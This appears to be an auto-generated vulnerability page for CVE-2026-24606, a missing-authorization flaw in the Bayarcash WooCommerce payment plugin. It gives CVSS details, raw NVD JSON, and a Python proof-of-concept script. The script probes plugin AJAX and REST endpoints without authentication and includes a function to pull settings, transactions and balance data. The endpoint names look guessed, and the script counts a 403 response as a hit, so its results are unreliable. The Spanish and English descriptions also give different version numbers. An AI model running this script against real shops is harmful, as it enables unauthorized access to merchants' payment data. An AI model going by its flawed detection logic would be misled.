Security Vulnerability Report
中文
CVE-2026-24606 CVSS 5.3 MEDIUM

CVE-2026-24606

Published: 2026-01-23 15:16:19
Last Modified: 2026-04-28 15:16:19

Description

Missing Authorization vulnerability in Web Impian Bayarcash WooCommerce bayarcash-wc allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Bayarcash WooCommerce: from n/a through <= 4.3.13.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Bayarcash WooCommerce (bayarcash-wc) 所有版本 <= 4.3.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-24606 PoC - Bayarcash WooCommerce Access Control Bypass # Affected: Bayarcash WooCommerce Plugin <= 4.3.13 # Type: Missing Authorization / Broken Access Control import requests import sys TARGET_URL = "https://example-wordpress-site.com" # 目标网站URL def check_vulnerability(): """ Check if the target is vulnerable to CVE-2026-24606 This PoC attempts to access sensitive plugin endpoints without authentication """ print(f"[*] Testing CVE-2026-24606 on {TARGET_URL}") print(f"[*] Target plugin: Bayarcash WooCommerce <= 4.3.13") # Try to access plugin admin endpoints without authentication vulnerable_endpoints = [ "/wp-admin/admin-ajax.php?action=bayarcash_get_settings", "/wp-admin/admin-ajax.php?action=bayarcash_update_config", "/wp-json/bayarcash/v1/settings", "/wp-json/bayarcash/v1/transactions" ] vulnerable = False for endpoint in vulnerable_endpoints: url = f"{TARGET_URL}{endpoint}" try: response = requests.get(url, timeout=10, verify=False) # Check if we get unauthorized access or data returned if response.status_code == 200 or response.status_code == 403: print(f"[+] Endpoint {endpoint} responded (Status: {response.status_code})") # Check response content for sensitive data if any(keyword in response.text.lower() for keyword in ['api_key', 'secret', 'config', 'settings', 'transaction']): print(f"[!] Potential sensitive data exposed at {endpoint}") vulnerable = True except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") if vulnerable: print("\n[!] VULNERABLE - Plugin appears to be affected by CVE-2026-24606") print("[!] Recommendation: Update Bayarcash WooCommerce to latest version") else: print("\n[*] NOT VULNERABLE or endpoints not found") return vulnerable def exploit_unauthorized_access(): """ Attempt to exploit the vulnerability to access/modify data """ print("\n[*] Attempting unauthorized data access...") # Try to retrieve settings/configuration settings_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Common Bayarcash WooCommerce AJAX actions actions = [ {"action": "bayarcash_get_transactions", "data": {"page": 1}}, {"action": "bayarcash_get_settings", "data": {}}, {"action": "bayarcash_get_balance", "data": {}} ] for payload in actions: try: response = requests.post( settings_url, data=payload, timeout=10, verify=False ) if response.status_code == 200: print(f"[+] Action '{payload['action']}' executed without auth") print(f" Response preview: {response.text[:200]}...") except requests.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] check_vulnerability() # Uncomment to attempt exploitation: # exploit_unauthorized_access()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24606", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:19.407", "lastModified": "2026-04-28T15:16:18.943", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Web Impian Bayarcash WooCommerce bayarcash-wc allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Bayarcash WooCommerce: from n/a through <= 4.3.13."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Web Impian Bayarcash WooCommerce bayarcash-wc permite la explotación de niveles de seguridad de control de acceso mal configurados. Este problema afecta a Bayarcash WooCommerce: desde n/a hasta &lt;= 4.3.11."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/bayarcash-wc/vulnerability/wordpress-bayarcash-woocommerce-plugin-4-3-11-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}